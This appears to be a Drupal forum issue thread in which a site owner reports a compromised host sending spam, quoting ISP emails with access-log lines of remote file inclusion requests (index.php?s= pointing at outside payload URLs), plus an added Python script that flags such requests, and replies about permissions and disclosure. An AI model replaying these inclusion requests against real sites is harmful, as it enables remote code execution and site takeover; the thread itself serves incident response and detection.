Not sure if this is a Drupal issue or not, but I did not modify anything in my Drupal installation yet, except for changing some configuration settings.

Somehow that s.php was created. How? I do not know. I am the only one with FTP access to the website. I installed Drupal on May 5th and s.php was created on May 9th. index.php was not modified. s.php is attached to this post.

Excerpts from emails from my ISP (1and1.com):

Received: Tue, 15 May 2007 11:42:43 -0700

Dear **********,

unfortunately we received a large number of complaints concerning spam mails sent through your 1&1 Webspace (contract number: ********).
We have to bring to your attention that this kind of mass mailing is illegal and can be prosecuted.

Received: Thu, 17 May 2007 06:17:04 -0700

Dear **********,

We are sorry to tell you that we have again received a considerable number of complaints about spam sent from your 1&1 Webspace (contract number: ********).

To prevent further abuse your Webspace must be temporarily locked.
Furthermore, we would ask you to contact us (abuse@oneandone.net) within two days in order to receive your comment on this concern.

Received: Fri, 18 May 2007 05:56:12 -0700

Dear **********,

it appears that your hosting account has been compromised via an insecure PHP script. Excerpt from your access log files:

158.170.64.*** - - [08/May/2007:17:56:49 -0400] "GET /index.php?s=http://www.pronext.eu/help/a.txt? HTTP/1.1" 200 5226 www.peanyscafe.com "-" "libwww-perl/5.79" "-"

70.86.59.*** - - [09/May/2007:12:23:46 -0400] "GET /index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.805" "-"

70.86.59.*** - - [09/May/2007:12:25:33 -0400] "GET /index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.805" "-"

71.198.125.*** - - [09/May/2007:12:31:18 -0400] "GET /index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.69" "-"

216.67.224.*** - - [09/May/2007:12:31:43 -0400] "GET /index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.805" "-"

62.240.180.*** - - [09/May/2007:12:33:02 -0400] "GET /index.php?s=http://www.themacbunch.net.nz/bare.png? HTTP/1.1" 200 5230 www.peanyscafe.com "-" "libwww-perl/5.805" "-"

217.112.42.*** - - [09/May/2007:12:54:02 -0400] "GET /index.php?s=http://www.pronext.eu/help/a.txt? HTTP/1.1" 200 5226 www.peanyscafe.com "-" "libwww-perl/5.79" "-"

Apparently there's an unsanitized include() statement performed on the $... variable of your script, which allows attackers to execute arbitrary PHP code with your user permissions.

We've disabled this script (chmod 000) to prevent further damage.

The following malicious files were apparently created with the help of the exploit:

/s.php
/index.php

These have been disabled as well.

Please update your script to prevent this kind of incident from recurring. Thank you for your understanding regarding the measures taken. Please also check your web space for other unknown files.
Attachment: s.php_.txt (4.51 KB), uploaded by CPeanutG
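A detection pass over access logs in the layout quoted in the ISP's email, added here as an example and not part of the original post: it parses each line, takes the query string apart and flags every parameter whose value is a remote URL, which is the request shape behind the include() problem the ISP describes. The log lines, IPs and hostnames in it are constructed placeholders, and the parser assumes Apache combined format with an extra vhost field before the referer.

```python
# Assumes the log layout of the ISP excerpt: Apache combined format with an
# extra vhost field before the referer and user-agent (constructed example).
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'(?:\S+ )?"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Values an unsanitised include()/require() would fetch over the network or a stream.
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://|^(?:php|data|expect):', re.I)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def remote_params(target):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_SCHEME.match(v)]


def scan(lines):
    """Return one finding per request that passed a remote URL in a parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in remote_params(rec["target"]):
            findings.append({"ip": rec["ip"], "time": rec["time"], "ua": rec["ua"],
                             "param": name, "url": value,
                             # 200 means the script answered: look for files created
                             # in the webroot around this time, as the ISP did with s.php.
                             "served": rec["status"] == "200"})
    return findings


# Constructed sample lines with placeholder IPs and domains, not the real log.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/May/2007:12:23:46 -0400] "GET /index.php?s=http://payload.example/bare.png? HTTP/1.1" 200 5230 www.example.com "-" "libwww-perl/5.805" "-"',
    '198.51.100.9 - - [09/May/2007:12:40:02 -0400] "GET /index.php?q=node/1 HTTP/1.1" 200 8120 www.example.com "-" "Mozilla/5.0" "-"',
    '203.0.113.6 - - [09/May/2007:12:54:02 -0400] "GET /index.php?s=ftp://payload.example/a.txt HTTP/1.1" 403 312 www.example.com "-" "libwww-perl/5.79" "-"',
]
```

Run `scan(SAMPLE_LOG)` against your own rotated logs (one line per element) to list the source addresses and timestamps to compare with file creation times in the webroot.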

Comments

Comment by kaerast

Security issues should not be discussed as a public issue like this. Can you email security@drupal.org with this information, plus a copy of index.php, version numbers of everything, a list of modules you are running and if possible a copy of your access log for 7th/8th May.

Comment by deavidsedice

Check the permissions in every folder. Remove write permissions for all of them, except the files directory.

A bug, coming from Drupal or a third-party module, could have let this spammer write the PHP file in your directory and execute it.

Try to disable modules that are related to uploads.

Comment by bradlis7

Status: Active » Closed (fixed)

I'm going to assume this has been solved, or is no longer an issue.